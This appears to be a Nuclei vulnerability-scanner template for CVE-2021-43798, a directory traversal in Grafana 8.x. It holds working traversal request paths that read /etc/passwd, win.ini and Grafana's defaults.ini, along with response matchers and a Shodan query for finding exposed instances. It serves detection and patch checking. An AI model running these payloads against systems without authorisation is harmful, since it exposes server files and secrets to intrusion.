nuclei-templates/http/cves/2021/CVE-2021-43798.yaml

52 lines
1.7 KiB
YAML

id: CVE-2021-43798
info:
name: Grafana v8.x - Arbitrary File Read
author: z0ne,dhiyaneshDk,j4vaovo
severity: high
description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
reference:
- https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
- https://nosec.org/home/detail/4914.html
- https://github.com/jas502n/Grafana-VulnTips
- https://nvd.nist.gov/vuln/detail/CVE-2021-43798
remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-43798
cwe-id: CWE-22
cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
epss-score: 0.97083
metadata:
max-request: 3
verified: "true"
shodan-query: title:"Grafana"
tags: cve,cve2021,grafana,lfi
http:
- method: GET
path:
- '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd'
- '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini'
- '{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
regex:
- 'root:.*:0:([0-9]+):'
- '\/tmp\/grafana\.sock'
- '\[(fonts|extensions|Mail|files)\]'
condition: or
- type: word
part: header
words:
- "text/plain"
- type: status
status:
- 200